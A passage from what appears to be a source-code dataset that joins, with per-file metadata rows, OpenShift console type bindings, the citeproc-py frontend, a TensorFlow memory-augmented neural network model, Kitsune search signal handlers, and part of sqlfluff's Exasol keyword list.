**({"name": name} if name is not None else {}),
**({"labels": labels} if labels is not None else {}),
**({"annotations": annotations} if annotations is not None else {}),
)
self.__spec = spec if spec is not None else ConsoleExternalLogLinkSpec()
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
spec = self.spec()
check_type("spec", spec, "ConsoleExternalLogLinkSpec")
v["spec"] = spec
return v
def spec(self) -> "ConsoleExternalLogLinkSpec":
return self.__spec
class Link(types.Object):
"""
Represents a standard link that could be generated in HTML
"""
@context.scoped
@typechecked
def __init__(self, text: str = "", href: str = ""):
super().__init__()
self.__text = text
self.__href = href
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
text = self.text()
check_type("text", text, str)
v["text"] = text
href = self.href()
check_type("href", href, str)
v["href"] = href
return v
def text(self) -> str:
"""
text is the display text for the link
"""
return self.__text
def href(self) -> str:
"""
href is the absolute secure URL for the link (must use https)
"""
return self.__href
class NamespaceDashboardSpec(types.Object):
"""
NamespaceDashboardSpec is a specification of namespaces in which the dashboard link should appear.
If both namespaces and namespaceSelector are specified, the link will appear in namespaces that match either
"""
@context.scoped
@typechecked
def __init__(
self,
namespaces: List[str] = None,
namespace_selector: "metav1.LabelSelector" = None,
):
super().__init__()
self.__namespaces = namespaces if namespaces is not None else []
self.__namespace_selector = namespace_selector
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
namespaces = self.namespaces()
check_type("namespaces", namespaces, Optional[List[str]])
if namespaces: # omit empty
v["namespaces"] = namespaces
namespace_selector = self.namespace_selector()
check_type(
"namespace_selector", namespace_selector, Optional["metav1.LabelSelector"]
)
if namespace_selector is not None: # omit empty
v["namespaceSelector"] = namespace_selector
return v
def namespaces(self) -> Optional[List[str]]:
"""
namespaces is an array of namespace names in which the dashboard link should appear.
"""
return self.__namespaces
def namespace_selector(self) -> Optional["metav1.LabelSelector"]:
"""
namespaceSelector is used to select the Namespaces that should contain dashboard link by label.
If the namespace labels match, dashboard link will be shown for the namespaces.
"""
return self.__namespace_selector
class ConsoleLinkSpec(types.Object):
"""
ConsoleLinkSpec is the desired console link configuration.
"""
@context.scoped
@typechecked
def __init__(
self,
link: "Link" = None,
location: ConsoleLinkLocation = None,
application_menu: "ApplicationMenuSpec" = None,
namespace_dashboard: "NamespaceDashboardSpec" = None,
):
super().__init__()
self.__link = link if link is not None else Link()
self.__location = location
self.__application_menu = application_menu
self.__namespace_dashboard = namespace_dashboard
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
link = self.link()
check_type("link", link, "Link")
v.update(link._root()) # inline
location = self.location()
check_type("location", location, ConsoleLinkLocation)
v["location"] = location
application_menu = self.application_menu()
check_type(
"application_menu", application_menu, Optional["ApplicationMenuSpec"]
)
if application_menu is not None: # omit empty
v["applicationMenu"] = application_menu
namespace_dashboard = self.namespace_dashboard()
check_type(
"namespace_dashboard",
namespace_dashboard,
Optional["NamespaceDashboardSpec"],
)
if namespace_dashboard is not None: # omit empty
v["namespaceDashboard"] = namespace_dashboard
return v
def link(self) -> "Link":
return self.__link
def location(self) -> ConsoleLinkLocation:
"""
location determines which location in the console the link will be appended to (ApplicationMenu, HelpMenu, UserMenu, NamespaceDashboard).
"""
return self.__location
def application_menu(self) -> Optional["ApplicationMenuSpec"]:
"""
applicationMenu holds information about section and icon used for the link in the
application menu, and it is applicable only when location is set to ApplicationMenu.
"""
return self.__application_menu
def namespace_dashboard(self) -> Optional["NamespaceDashboardSpec"]:
"""
namespaceDashboard holds information about namespaces in which the dashboard link should
appear, and it is applicable only when location is set to NamespaceDashboard.
If not specified, the link will appear in all namespaces.
"""
return self.__namespace_dashboard
class ConsoleLink(base.TypedObject, base.MetadataObject):
"""
ConsoleLink is an extension for customizing OpenShift web console links.
"""
@context.scoped
@typechecked
def __init__(
self,
name: str = None,
labels: Dict[str, str] = None,
annotations: Dict[str, str] = None,
spec: "ConsoleLinkSpec" = None,
):
super().__init__(
api_version="console.openshift.io/v1",
kind="ConsoleLink",
**({"name": name} if name is not None else {}),
**({"labels": labels} if labels is not None else {}),
**({"annotations": annotations} if annotations is not None else {}),
)
self.__spec = spec if spec is not None else ConsoleLinkSpec()
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
spec = self.spec()
check_type("spec", spec, "ConsoleLinkSpec")
v["spec"] = spec
return v
def spec(self) -> "ConsoleLinkSpec":
return self.__spec
class ConsoleNotificationSpec(types.Object):
"""
ConsoleNotificationSpec is the desired console notification configuration.
"""
@context.scoped
@typechecked
def __init__(
self,
text: str = "",
location: ConsoleNotificationLocation = None,
link: "Link" = None,
color: str = None,
background_color: str = None,
):
super().__init__()
self.__text = text
self.__location = location
self.__link = link
self.__color = color
self.__background_color = background_color
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
text = self.text()
check_type("text", text, str)
v["text"] = text
location = self.location()
check_type("location", location, Optional[ConsoleNotificationLocation])
if location: # omit empty
v["location"] = location
link = self.link()
check_type("link", link, Optional["Link"])
if link is not None: # omit empty
v["link"] = link
color = self.color()
check_type("color", color, Optional[str])
if color: # omit empty
v["color"] = color
background_color = self.background_color()
check_type("background_color", background_color, Optional[str])
if background_color: # omit empty
v["backgroundColor"] = background_color
return v
def text(self) -> str:
"""
text is the visible text of the notification.
"""
return self.__text
def location(self) -> Optional[ConsoleNotificationLocation]:
"""
location is the location of the notification in the console.
"""
return self.__location
def link(self) -> Optional["Link"]:
"""
link is an object that holds notification link details.
"""
return self.__link
def color(self) -> Optional[str]:
"""
color is the color of the text for the notification as CSS data type color.
"""
return self.__color
def background_color(self) -> Optional[str]:
"""
backgroundColor is the color of the background for the notification as CSS data type color.
"""
return self.__background_color
class ConsoleNotification(base.TypedObject, base.MetadataObject):
"""
ConsoleNotification is the extension for configuring openshift web console notifications.
"""
@context.scoped
@typechecked
def __init__(
self,
name: str = None,
labels: Dict[str, str] = None,
annotations: Dict[str, str] = None,
spec: "ConsoleNotificationSpec" = None,
):
super().__init__(
api_version="console.openshift.io/v1",
kind="ConsoleNotification",
**({"name": name} if name is not None else {}),
**({"labels": labels} if labels is not None else {}),
**({"annotations": annotations} if annotations is not None else {}),
)
self.__spec = spec if spec is not None else ConsoleNotificationSpec()
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
spec = self.spec()
check_type("spec", spec, "ConsoleNotificationSpec")
v["spec"] = spec
return v
def spec(self) -> "ConsoleNotificationSpec":
return self.__spec
class ConsoleYAMLSampleSpec(types.Object):
"""
ConsoleYAMLSampleSpec is the desired YAML sample configuration.
Samples will appear with their descriptions in a samples sidebar
    when creating resources in the web console.
"""
@context.scoped
@typechecked
def __init__(
self,
target_resource: "metav1.TypeMeta" = None,
title: ConsoleYAMLSampleTitle = None,
description: ConsoleYAMLSampleDescription = None,
yaml: ConsoleYAMLSampleYAML = None,
snippet: bool = False,
):
super().__init__()
self.__target_resource = (
target_resource if target_resource is not None else metav1.TypeMeta()
)
self.__title = title
self.__description = description
self.__yaml = yaml
self.__snippet = snippet
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
target_resource = self.target_resource()
check_type("target_resource", target_resource, "metav1.TypeMeta")
v["targetResource"] = target_resource
title = self.title()
check_type("title", title, ConsoleYAMLSampleTitle)
v["title"] = title
description = self.description()
check_type("description", description, ConsoleYAMLSampleDescription)
v["description"] = description
yaml = self.yaml()
check_type("yaml", yaml, ConsoleYAMLSampleYAML)
v["yaml"] = yaml
snippet = self.snippet()
check_type("snippet", snippet, bool)
v["snippet"] = snippet
return v
def target_resource(self) -> "metav1.TypeMeta":
"""
        targetResource contains the apiVersion and kind of the resource
        that the YAML sample is representing.
"""
return self.__target_resource
def title(self) -> ConsoleYAMLSampleTitle:
"""
title of the YAML sample.
"""
return self.__title
def description(self) -> ConsoleYAMLSampleDescription:
"""
description of the YAML sample.
"""
return self.__description
def yaml(self) -> ConsoleYAMLSampleYAML:
"""
yaml is the YAML sample to display.
"""
return self.__yaml
def snippet(self) -> bool:
"""
snippet indicates that the YAML sample is not the full YAML resource
definition, but a fragment that can be inserted into the existing
YAML document at the user's cursor.
"""
return self.__snippet
class ConsoleYAMLSample(base.TypedObject, base.MetadataObject):
"""
ConsoleYAMLSample is an extension for customizing OpenShift web console YAML samples.
"""
@context.scoped
@typechecked
def __init__(
self,
name: str = None,
labels: Dict[str, str] = None,
annotations: Dict[str, str] = None,
spec: "ConsoleYAMLSampleSpec" = None,
):
super().__init__(
api_version="console.openshift.io/v1",
kind="ConsoleYAMLSample",
**({"name": name} if name is not None else {}),
**({"labels": labels} if labels is not None else {}),
**({"annotations": annotations} if annotations is not None else {}),
)
self.__spec = spec if spec is not None else ConsoleYAMLSampleSpec()
@typechecked
def _root(self) -> Dict[str, Any]:
v = super()._root()
spec = self.spec()
check_type("spec", spec, "ConsoleYAMLSampleSpec")
v["spec"] = spec
return v
def spec(self) -> "ConsoleYAMLSampleSpec":
return self.__spec
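# ---------------------------------------------------------------------------
# Minimal construction sketch (not part of the generated module): the name,
# section, link text and URL below are made-up values, and only classes
# defined above are used; serialization and enum-typed fields are omitted.
if __name__ == "__main__":
    example_link = ConsoleLink(
        name="example-link",
        spec=ConsoleLinkSpec(
            link=Link(text="Docs", href="https://docs.example.com"),
            application_menu=ApplicationMenuSpec(section="Documentation"),
        ),
    )
    print(example_link.spec().link().href())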
| 33.103967
| 160
| 0.620356
|
bf89f791a5068233a584dbf1f3f6bd57faa9490b
| 3,781
|
py
|
Python
|
citeproc/frontend.py
|
phfaist/citeproc-py
|
3748be5bb945e5d7e47579a619dd49a1f039f075
|
[
"BSD-2-Clause-FreeBSD"
] | 84
|
2015-01-03T15:06:06.000Z
|
2022-02-12T09:57:41.000Z
|
citeproc/frontend.py
|
phfaist/citeproc-py
|
3748be5bb945e5d7e47579a619dd49a1f039f075
|
[
"BSD-2-Clause-FreeBSD"
] | 96
|
2015-01-16T14:57:47.000Z
|
2022-02-25T13:47:09.000Z
|
citeproc/frontend.py
|
phfaist/citeproc-py
|
3748be5bb945e5d7e47579a619dd49a1f039f075
|
[
"BSD-2-Clause-FreeBSD"
] | 37
|
2015-01-28T21:55:56.000Z
|
2021-11-15T02:12:40.000Z
|
import os
from warnings import warn
from lxml import etree
from . import SCHEMA_PATH, LOCALES_PATH, STYLES_PATH
from .model import CitationStylesElement
from .formatter import html
class CitationStylesXML(object):
def __init__(self, f, validate=True):
lookup = etree.ElementNamespaceClassLookup()
namespace = lookup.get_namespace('http://purl.org/net/xbiblio/csl')
namespace[None] = CitationStylesElement
namespace.update(dict([(cls.__name__.replace('_', '-').lower(), cls)
for cls in CitationStylesElement.__subclasses__()]))
self.parser = etree.XMLParser(remove_comments=True, encoding='UTF-8',
no_network=True)
self.parser.set_element_class_lookup(lookup)
self.xml = etree.parse(f, self.parser)#, base_url=".")
if validate:
self.schema = etree.RelaxNG(etree.parse(SCHEMA_PATH))
if not self.schema.validate(self.xml):
err = self.schema.error_log
#raise Exception("XML file didn't pass schema validation:\n%s" % err)
warn("XML file didn't pass schema validation:\n%s" % err)
# TODO: proper error reporting
self.root = self.xml.getroot()
class CitationStylesLocale(CitationStylesXML):
def __init__(self, locale, validate=True):
locale_path = os.path.join(LOCALES_PATH, 'locales-{}.xml'.format(locale))
try:
super(CitationStylesLocale, self).__init__(locale_path,
validate=validate)
except IOError:
raise ValueError("'{}' is not a known locale".format(locale))
class CitationStylesStyle(CitationStylesXML):
def __init__(self, style, locale=None, validate=True):
try:
if not os.path.exists(style):
style = os.path.join(STYLES_PATH, '{}.csl'.format(style))
except TypeError:
pass
try:
super(CitationStylesStyle, self).__init__(
style, validate=validate)
except IOError:
raise ValueError("'{}' is not a known style".format(style))
if locale is None:
locale = self.root.get('default-locale', 'en-US')
self.root.set_locale_list(locale, validate=validate)
def has_bibliography(self):
return self.root.bibliography is not None
def render_citation(self, citation, cites, callback=None):
return self.root.citation.render(citation, cites, callback)
def sort_bibliography(self, citation_items):
return self.root.bibliography.sort(citation_items)
def render_bibliography(self, citation_items):
return self.root.bibliography.render(citation_items)
class CitationStylesBibliography(object):
def __init__(self, style, source, formatter=html):
self.style = style
self.source = source
self.formatter = self.style.root.formatter = formatter
self.keys = []
self.items = []
self._cites = []
def register(self, citation, callback=None):
citation.bibliography = self
for item in citation.cites:
if item.key in self.source:
if item.key not in self.keys:
self.keys.append(item.key)
self.items.append(item)
elif callback is not None:
callback(item)
def sort(self):
self.items = self.style.sort_bibliography(self.items)
self.keys = [item.key for item in self.items]
def cite(self, citation, callback):
return self.style.render_citation(citation, self._cites, callback)
def bibliography(self):
return self.style.render_bibliography(self.items)
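# ---------------------------------------------------------------------------
# Minimal usage sketch (not part of the original module), following the
# pattern of the project's own examples. The reference data is made up, and
# Citation/CitationItem/CiteProcJSON as well as the bundled 'harvard1' style
# are assumed to be available as in those examples.
if __name__ == "__main__":
    from citeproc import Citation, CitationItem
    from citeproc.source.json import CiteProcJSON

    source = CiteProcJSON([{
        "id": "doe2020",
        "type": "article-journal",
        "title": "An Example Article",
        "author": [{"family": "Doe", "given": "Jane"}],
        "issued": {"date-parts": [[2020]]},
    }])
    style = CitationStylesStyle("harvard1", validate=False)
    bibliography = CitationStylesBibliography(style, source, html)
    citation = Citation([CitationItem("doe2020")])
    bibliography.register(citation)
    print(bibliography.cite(citation, lambda item: None))
    for entry in bibliography.bibliography():
        print(str(entry))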
| 37.068627
| 85
| 0.626025
|
f96af9a0c348f9f4aa9dbd7d04c1359ad1322266
| 15,360
|
py
|
Python
|
adnc/model/mann.py
|
carusyte/ADNC
|
4a5dfa5be1aca9f815794c2c276ec220a1eb591d
|
[
"Apache-2.0"
] | 62
|
2018-07-05T13:55:13.000Z
|
2019-01-03T15:58:07.000Z
|
adnc/model/mann.py
|
carusyte/ADNC
|
4a5dfa5be1aca9f815794c2c276ec220a1eb591d
|
[
"Apache-2.0"
] | 1
|
2018-12-26T18:59:32.000Z
|
2019-01-02T15:32:40.000Z
|
adnc/model/mann.py
|
carusyte/ADNC
|
4a5dfa5be1aca9f815794c2c276ec220a1eb591d
|
[
"Apache-2.0"
] | 8
|
2019-02-03T03:14:54.000Z
|
2020-07-17T22:33:41.000Z
|
# Copyright 2018 Jörg Franke
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import numpy as np
import tensorflow as tf
from tensorflow.contrib.rnn import MultiRNNCell
from tensorflow.python.ops import variable_scope as vs
from adnc.model.controller_units.controller import get_rnn_cell_list
from adnc.model.memory_units.memory_unit import get_memory_unit
from adnc.model.utils import HolisticMultiRNNCell
from adnc.model.utils import WordEmbedding
"""
The memory augmented neural network (MANN) model object contains the controller and the memory unit as well as the
loss function and connects everything.
"""
class MANN():
def __init__(self, config, analyse=False, reuse=False, name='mann', dtype=tf.float32):
"""
Args:
config: dict, configuration of the whole model
analyse: bool, is analyzer is used or not
reuse: bool, reuse model or not
"""
self.seed = config["seed"]
self.rng = np.random.RandomState(seed=self.seed)
self.dtype = dtype
self.analyse = analyse
self.input_size = config["input_size"]
self.output_size = config["output_size"]
self.batch_size = config["batch_size"]
self.input_embedding = config["input_embedding"]
self.architecture = config['architecture']
self.controller_config = config["controller_config"]
self.memory_unit_config = config["memory_unit_config"]
self.output_function = config["output_function"]
self.output_mask = config["output_mask"]
self.loss_function = config['loss_function']
self.reuse = reuse
self.name = name
self.mask = tf.placeholder(self.dtype, [None, self.batch_size], name='mask')
self.target = tf.placeholder(self.dtype, [None, self.batch_size, self.output_size], name='y')
if self.input_embedding:
word_idx_dict = self.input_embedding['word_idx_dict']
embedding_size = self.input_embedding['embedding_size']
if 'tmp_dir' in self.input_embedding:
tmp_dir = self.input_embedding['tmp_dir']
else:
tmp_dir = "data_tmp"
glove = WordEmbedding(embedding_size, word_idx_dict=word_idx_dict, initialization='glove', tmp_dir=tmp_dir)
self._data = tf.placeholder(tf.int64, [None, self.batch_size], name='x')
self.data = glove.embed(self._data)
else:
self.data = tf.placeholder(tf.float32, [None, self.batch_size, self.input_size], name='x')
if self.architecture in ['uni', 'unidirectional']:
unweighted_outputs, states = self.unidirectional(self.data, self.controller_config, self.memory_unit_config,
reuse=self.reuse)
elif self.architecture in ['bi', 'bidirectional']:
unweighted_outputs, states = self.bidirectional(self.data, self.controller_config, self.memory_unit_config,
reuse=self.reuse)
else:
raise UserWarning("Unknown architecture, use unidirectional or bidirectional")
if self.analyse:
with tf.device('/cpu:0'):
if self.architecture in ['uni', 'unidirectional']:
analyse_outputs, analyse_states = self.unidirectional(self.data, self.controller_config,
self.memory_unit_config, analyse=True,
reuse=True)
analyse_outputs, analyse_signals = analyse_outputs
self.analyse = (analyse_outputs, analyse_signals, analyse_states)
elif self.architecture in ['bi', 'bidirectional']:
analyse_outputs, analyse_states = self.bidirectional(self.data, self.controller_config,
self.memory_unit_config, analyse=True,
reuse=True)
analyse_outputs, analyse_signals = analyse_outputs
self.analyse = (analyse_outputs, analyse_signals, analyse_states)
self.unweighted_outputs = unweighted_outputs
self.prediction, self.outputs = self._output_layer(unweighted_outputs)
self.loss = self.get_loss(self.prediction)
def _output_layer(self, outputs):
"""
Calculates the weighted and activated output of the MANN model
Args:
outputs: TF tensor, concatenation of memory units output and controller output
Returns: TF tensor, predictions; TF tensor, unactivated predictions
"""
with tf.variable_scope("output_layer"):
output_size = outputs.get_shape()[-1].value
weights_concat = tf.get_variable("weights_concat", (output_size, self.output_size),
initializer=tf.contrib.layers.xavier_initializer(seed=self.seed),
collections=['mann', tf.GraphKeys.GLOBAL_VARIABLES], dtype=self.dtype)
bias_merge = tf.get_variable("bias_merge", (self.output_size,), initializer=tf.constant_initializer(0.),
collections=['mann', tf.GraphKeys.GLOBAL_VARIABLES], dtype=self.dtype)
output_flat = tf.reshape(outputs, [-1, output_size])
output_flat = tf.matmul(output_flat, weights_concat) + bias_merge
if self.output_function == 'softmax':
predictions_flat = tf.nn.softmax(output_flat)
elif self.output_function == 'tanh':
predictions_flat = tf.tanh(output_flat)
elif self.output_function == 'linear':
predictions_flat = output_flat
else:
raise UserWarning("Unknown output function, use softmax, tanh or linear")
predictions = tf.reshape(predictions_flat, [-1, self.batch_size, self.output_size])
weighted_outputs = tf.reshape(output_flat, [-1, self.batch_size, self.output_size])
return predictions, weighted_outputs
def get_loss(self, prediction):
"""
Args:
prediction: TF tensor, activated prediction of the model
Returns: TF scalar, loss of the current forward set
"""
if self.loss_function == 'cross_entropy':
if self.output_mask:
cost = tf.reduce_sum(
-1 * self.target * tf.log(tf.clip_by_value(prediction, 1e-12, 10.0)) - (1 - self.target) * tf.log(
tf.clip_by_value(1 - prediction, 1e-12, 10.0)), axis=2)
cost *= self.mask
loss = tf.reduce_sum(cost) / tf.reduce_sum(self.mask)
else:
loss = tf.reduce_mean(
-1 * self.target * tf.log(tf.clip_by_value(prediction, 1e-12, 10.0)) - (1 - self.target) * tf.log(
tf.clip_by_value(1 - prediction, 1e-12, 10.0)))
elif self.loss_function == 'mse':
clipped_prediction = tf.clip_by_value(prediction, 1e-12, 10.0)
mse = tf.square(self.target - clipped_prediction)
mse = tf.reduce_mean(mse, axis=2)
if self.output_mask:
cost = mse * self.mask
loss = tf.reduce_sum(cost) / tf.reduce_sum(self.mask)
else:
loss = tf.reduce_mean(mse)
else:
raise UserWarning("Unknown loss function, use cross_entropy or mse")
return loss
def unidirectional(self, inputs, controller_config, memory_unit_config, analyse=False, reuse=False):
"""
Connects unidirectional controller and memory unit and performs scan over sequence
Args:
inputs: TF tensor, input sequence
controller_config: dict, configuration of the controller
memory_unit_config: dict, configuration of the memory unit
analyse: bool, do analysis
reuse: bool, reuse
Returns: TF tensor, output sequence; TF tensor, hidden states
"""
with tf.variable_scope("controller"):
controller_list = get_rnn_cell_list(controller_config, name='controller', reuse=reuse, seed=self.seed,
dtype=self.dtype)
if controller_config['connect'] == 'sparse':
memory_input_size = controller_list[-1].output_size
mu_cell = get_memory_unit(memory_input_size, memory_unit_config, 'memory_unit', analyse=analyse,
reuse=reuse)
cell = MultiRNNCell(controller_list + [mu_cell])
else:
controller_cell = HolisticMultiRNNCell(controller_list)
memory_input_size = controller_cell.output_size
mu_cell = get_memory_unit(memory_input_size, memory_unit_config, 'memory_unit', analyse=analyse,
reuse=reuse)
cell = MultiRNNCell([controller_cell, mu_cell])
batch_size = inputs.get_shape()[1].value
cell_init_states = cell.zero_state(batch_size, dtype=self.dtype)
output_init = tf.zeros([batch_size, cell.output_size], dtype=self.dtype)
if analyse:
output_init = (output_init, mu_cell.analyse_state(batch_size, dtype=self.dtype))
init_states = (output_init, cell_init_states)
def step(pre_states, inputs):
pre_rnn_output, pre_rnn_states = pre_states
if analyse:
pre_rnn_output = pre_rnn_output[0]
controller_inputs = tf.concat([inputs, pre_rnn_output], axis=-1)
rnn_output, rnn_states = cell(controller_inputs, pre_rnn_states)
return (rnn_output, rnn_states)
outputs, states = tf.scan(step, inputs, initializer=init_states, parallel_iterations=32)
return outputs, states
def bidirectional(self, inputs, controller_config, memory_unit_config, analyse=False, reuse=False):
"""
Connects bidirectional controller and memory unit and performs scan over sequence
Args:
inputs: TF tensor, input sequence
controller_config: dict, configuration of the controller
memory_unit_config: dict, configuration of the memory unit
analyse: bool, do analysis
reuse: bool, reuse
Returns: TF tensor, output sequence; TF tensor, hidden states
"""
with tf.variable_scope("controller"):
list_fw = get_rnn_cell_list(controller_config, name='con_fw', reuse=reuse, seed=self.seed, dtype=self.dtype)
list_bw = get_rnn_cell_list(controller_config, name='con_bw', reuse=reuse, seed=self.seed, dtype=self.dtype)
if controller_config['connect'] == 'sparse':
cell_fw = MultiRNNCell(list_fw)
cell_bw = MultiRNNCell(list_bw)
else:
cell_fw = HolisticMultiRNNCell(list_fw)
cell_bw = HolisticMultiRNNCell(list_bw)
memory_input_size = cell_fw.output_size + cell_bw.output_size
cell_mu = get_memory_unit(memory_input_size, memory_unit_config, 'memory_unit', analyse=analyse, reuse=reuse)
with vs.variable_scope("bw") as bw_scope:
inputs_reverse = tf.reverse(inputs, axis=[0])
output_bw, output_state_bw = tf.nn.dynamic_rnn(cell=cell_bw, inputs=inputs_reverse, dtype=self.dtype,
parallel_iterations=32, time_major=True, scope=bw_scope)
output_bw = tf.reverse(output_bw, axis=[0])
batch_size = inputs.get_shape()[1].value
cell_fw_init_states = cell_fw.zero_state(batch_size, dtype=self.dtype)
cell_mu_init_states = cell_mu.zero_state(batch_size, dtype=self.dtype)
output_init = tf.zeros([batch_size, cell_mu.output_size], dtype=self.dtype)
if analyse:
output_init = (output_init, cell_mu.analyse_state(batch_size, dtype=self.dtype))
init_states = (output_init, cell_fw_init_states, cell_mu_init_states)
coupled_inputs = (inputs, output_bw)
with vs.variable_scope("fw") as fw_scope:
def step(pre_states, coupled_inputs):
inputs, output_bw = coupled_inputs
pre_outputs, pre_states_fw, pre_states_mu = pre_states
if analyse:
pre_outputs = pre_outputs[0]
controller_inputs = tf.concat([inputs, pre_outputs], axis=-1)
output_fw, states_fw = cell_fw(controller_inputs, pre_states_fw)
mu_inputs = tf.concat([output_fw, output_bw], axis=-1)
output_mu, states_mu = cell_mu(mu_inputs, pre_states_mu)
return (output_mu, states_fw, states_mu)
outputs, states_fw, states_mu = tf.scan(step, coupled_inputs, initializer=init_states,
parallel_iterations=32)
states = states_fw, states_mu
return outputs, states
@property
def feed(self):
"""
        Returns: TF placeholders for the data, target and mask inputs to the model
"""
return self.data, self.target, self.mask
@property
def controller_trainable_variables(self):
return tf.get_collection('recurrent_unit')
@property
def memory_unit_trainable_variables(self):
return tf.get_collection('memory_unit')
@property
def mann_trainable_variables(self):
return tf.get_collection('mann')
@property
def trainable_variables(self):
return tf.trainable_variables()
@property
def controller_parameter_amount(self):
return self.count_parameter_amount(self.controller_trainable_variables)
@property
def memory_unit_parameter_amount(self):
return self.count_parameter_amount(self.memory_unit_trainable_variables)
@property
def mann_parameter_amount(self):
return self.count_parameter_amount(self.mann_trainable_variables)
@staticmethod
def count_parameter_amount(var_list):
parameters = 0
for variable in var_list:
shape = variable.get_shape()
            variable_parameters = 1
            for dim in shape:
                variable_parameters *= dim.value
            parameters += variable_parameters
return parameters
@property
def parameter_amount(self):
var_list = tf.trainable_variables()
return self.count_parameter_amount(var_list)
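# A minimal sketch, assuming toy shapes, of the same arithmetic that
# count_parameter_amount performs on TF variable shapes: a 10x20 weight
# matrix plus a length-20 bias vector gives 220 trainable parameters.
def _count_params_from_shapes(shapes):
    total = 0
    for shape in shapes:
        n = 1
        for dim in shape:
            n *= dim  # mirrors `variable_parameters *= dim.value` above
        total += n
    return total
assert _count_params_from_shapes([(10, 20), (20,)]) == 220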
| 44.651163
| 120
| 0.618685
|
c4f6ab7acce5ccebaffba5ca96bedf61f289e3f8
| 1,033
|
py
|
Python
|
kitsune/search/v2/signals/wiki.py
|
anthonymark33/kitsune
|
488a690ca63db0217dc9f3ede88b78db257699a3
|
[
"BSD-3-Clause"
] | 1
|
2020-12-14T09:51:32.000Z
|
2020-12-14T09:51:32.000Z
|
kitsune/search/v2/signals/wiki.py
|
anthonymark33/kitsune
|
488a690ca63db0217dc9f3ede88b78db257699a3
|
[
"BSD-3-Clause"
] | null | null | null |
kitsune/search/v2/signals/wiki.py
|
anthonymark33/kitsune
|
488a690ca63db0217dc9f3ede88b78db257699a3
|
[
"BSD-3-Clause"
] | null | null | null |
from django.db.models.signals import post_save, m2m_changed, post_delete
from kitsune.search.v2.es7_utils import (
index_object,
delete_object,
remove_from_field,
)
from kitsune.search.v2.decorators import search_receiver
from kitsune.wiki.models import Document
from kitsune.products.models import Product, Topic
@search_receiver(post_save, Document)
@search_receiver(m2m_changed, Document.products.through)
@search_receiver(m2m_changed, Document.topics.through)
def handle_document_save(instance, **kwargs):
index_object.delay("WikiDocument", instance.pk)
@search_receiver(post_delete, Document)
def handle_document_delete(instance, **kwargs):
delete_object.delay("WikiDocument", instance.pk)
@search_receiver(post_delete, Product)
def handle_product_delete(instance, **kwargs):
remove_from_field.delay("WikiDocument", "product_ids", instance.pk)
@search_receiver(post_delete, Topic)
def handle_topic_delete(instance, **kwargs):
remove_from_field.delay("WikiDocument", "topic_ids", instance.pk)
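# A minimal sketch, using only stock Django signal APIs, of the wiring pattern
# above; `search_receiver` is project-specific, so the generic `receiver`
# decorator stands in for it, and the print call is just a placeholder for the
# real re-index task.
from django.dispatch import receiver
@receiver(post_delete)
def log_any_delete(sender, instance, **kwargs):
    print(f"{sender.__name__} instance {instance.pk} deleted")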
| 32.28125
| 72
| 0.802517
|
0b66da63babd20bf57e7991cebcff1e6e75a2ddc
| 13,958
|
py
|
Python
|
src/sqlfluff/dialects/exasol_keywords.py
|
netlify/sqlfluff
|
6f22eb08a0701f41132ee4847ddf1a64ca79da80
|
[
"MIT"
] | 2
|
2021-08-04T08:58:33.000Z
|
2021-08-04T18:54:06.000Z
|
src/sqlfluff/dialects/exasol_keywords.py
|
netlify/sqlfluff
|
6f22eb08a0701f41132ee4847ddf1a64ca79da80
|
[
"MIT"
] | 1
|
2020-04-02T09:05:39.000Z
|
2020-12-10T14:42:59.000Z
|
src/sqlfluff/dialects/exasol_keywords.py
|
netlify/sqlfluff
|
6f22eb08a0701f41132ee4847ddf1a64ca79da80
|
[
"MIT"
] | 1
|
2021-07-03T12:56:56.000Z
|
2021-07-03T12:56:56.000Z
|
"""A list of all SQL key words."""
RESERVED_KEYWORDS = [
"ABSOLUTE",
"ACTION",
"ADD",
"AFTER",
"ALL",
"ALLOCATE",
"ALTER",
"AND",
"ANY",
"APPEND",
"ARE",
"ARRAY",
"AS",
"ASC",
"ASENSITIVE",
"ASSERTION",
"AT",
"ATTRIBUTE",
"AUTHID",
"AUTHORIZATION",
"BEFORE",
"BEGIN",
"BETWEEN",
"BIGINT",
"BINARY",
"BIT",
"BLOB",
"BLOCKED",
"BOOL",
"BOOLEAN",
"BOTH",
"BY",
"BYTE",
"CALL",
"CALLED",
"CARDINALITY",
"CASCADE",
"CASCADED",
"CASE",
"CASESPECIFIC",
"CAST",
"CATALOG",
"CHAIN",
"CHAR",
"CHARACTER",
"CHARACTERISTICS",
"CHARACTER_SET_CATALOG",
"CHARACTER_SET_NAME",
"CHARACTER_SET_SCHEMA",
"CHECK",
"CHECKED",
"CLOB",
"CLOSE",
"COALESCE",
"COLLATE",
"COLLATION",
"COLLATION_CATALOG",
"COLLATION_NAME",
"COLLATION_SCHEMA",
"COLUMN",
"COMMIT",
"CONDITION",
"CONNECTION",
"CONNECT_BY_ISCYCLE",
"CONNECT_BY_ISLEAF",
"CONNECT_BY_ROOT",
"CONSTANT",
"CONSTRAINT",
"CONSTRAINTS",
"CONSTRAINT_STATE_DEFAULT",
"CONSTRUCTOR",
"CONTAINS",
"CONTINUE",
"CONTROL",
"CONVERT",
"CORRESPONDING",
"CREATE",
"CS",
"CSV",
"CUBE",
"CURRENT",
"CURRENT_DATE",
"CURRENT_PATH",
"CURRENT_ROLE",
"CURRENT_SCHEMA",
"CURRENT_SESSION",
"CURRENT_STATEMENT",
"CURRENT_TIME",
"CURRENT_TIMESTAMP",
"CURRENT_USER",
"CURSOR",
"CYCLE",
"DATA",
"DATALINK",
"DATE",
"DATETIME_INTERVAL_CODE",
"DATETIME_INTERVAL_PRECISION",
"DAY",
"DBTIMEZONE",
"DEALLOCATE",
"DEC",
"DECIMAL",
"DECLARE",
"DEFAULT",
"DEFAULT_LIKE_ESCAPE_CHARACTER",
"DEFERRABLE",
"DEFERRED",
